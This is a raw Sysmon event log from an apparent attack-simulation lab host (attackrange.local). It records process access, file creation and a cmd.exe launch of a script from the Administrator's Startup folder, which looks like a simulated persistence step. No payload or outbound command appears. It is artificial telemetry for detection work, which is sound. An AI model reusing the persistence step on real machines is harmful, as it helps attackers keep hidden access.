12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.616{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-64C5-6064-A500-00000000AE01}43566240C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\Explorer.EXE+91a26|C:\Windows\Explorer.EXE+11a0b|C:\Windows\Explorer.EXE+1187e|C:\Windows\Explorer.EXE+f7c2|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x80000000000000007774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.618{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" 
"C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000007773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.538{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754C8D648BC1B365A18498AA9797DB0C,SHA256=5FDAD11DC2A7664618CEC52D0F3CDECD0DAD11BC31284B029832196E891E2902,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.972{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:43.972{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.941{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6C73420D9D1627B68AEEB7C0A0C684,SHA256=8DDA091CE68D166B7810A32FFD74745B723FE586DA78AAD0289C14EFFFC22D51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:43.925{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.925{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x80000000000000007811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:43.832{266CAFBE-64E2-6064-BC00-00000000AE01}6860\PSHost.132616657626760604.6860.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000007810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.722{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fdakewdm.sr0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.722{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1t5xbwh2.jc2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.629{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8D46D974CBEA89AFE3E49ABBD629041B,SHA256=51E0E46417ADD0138151DD4E0170F127818F0446114E7DA10CD587D3670953E8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:43.582{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1t5xbwh2.jc2.ps12021-03-31 12:02:43.582 10341000x80000000000000007806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.985{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=906C0284BA09EC137674FFA9C2782A8C,SHA256=09FC448B904390C004A74482EB1EF491008E4466ABFD642929168DA5FF48DB8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.938{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=07082D445C114B32D0BC9254530270E8,SHA256=BAE3E8351CFD30428E55AE32028163EF815FA863192FAAA56FBFA0105D4ABD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.922{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0DCB0D7970CF1781D56EE3717162CBDB,SHA256=AEEF87976C2A116FFFA67797ED56EB2764B0E806890408D71699F34961916B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.907{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2BC738D7BBE20A38D5E1C3E0C38D7BFB,SHA256=66C319F6F3D4AD4C08C5784E95304353719DEC88BFBDF3A63F7F5046F5763B94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.876{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC1A2F711325EE0668B1E5FC2DD2B8BA,SHA256=ABC5C8C7271C5DF009AD545B13447C3D70B00DAA9BBAC65571F86951E2833BF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.860{266CAFBE-648B-6064-7A00-00000000AE01}4692NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=092D8AAC47531729DAE82F6E41EFFC97,SHA256=673E3B4922DA367D59C249318D78C7BA5785F7496AA29732E3052808185006B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.829{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A00C32FCC9B86E8E7D6B21D63A4793C3,SHA256=17B0B3866081F5707B735CD1BA22CE2A11CA5DB4E9F35D318B363F3AA0B9B316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.766{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DD9CB6DDE62301030129F4F8DF34A270,SHA256=8DFB381CD35C0ACB5A634AFA1AA6EA599DC0674B178CB121E9426C6F034E7E15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.735{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8ADE48FC6AA6432A9DA5EB7290DB5B6,SHA256=F143A88BCDAB51F6403219A5AB8B225A28004BA4118C63D9B2644DA989DAF8B0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000007835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.720{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=14B2CADCE0AE819DFF440779CF58AD21,SHA256=7A301F5CADAE959651C5A3495B0AA7401C198EF18D921D8D105D0ED7114772FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.689{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3502936C4B1EB57235C14EF22BA4FC7D,SHA256=E90961C0261883B9324F31D5D43D522AD5542207281CE09E808BBC0440647451,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.657{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x80000000000000007832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.657{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6ED1A1FD6FC9DF51015270329BB61C56,SHA256=0D48FAC0A715F9E47234501B3DB9787D361FA5110207DB3F2E4BA60B24D66FF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
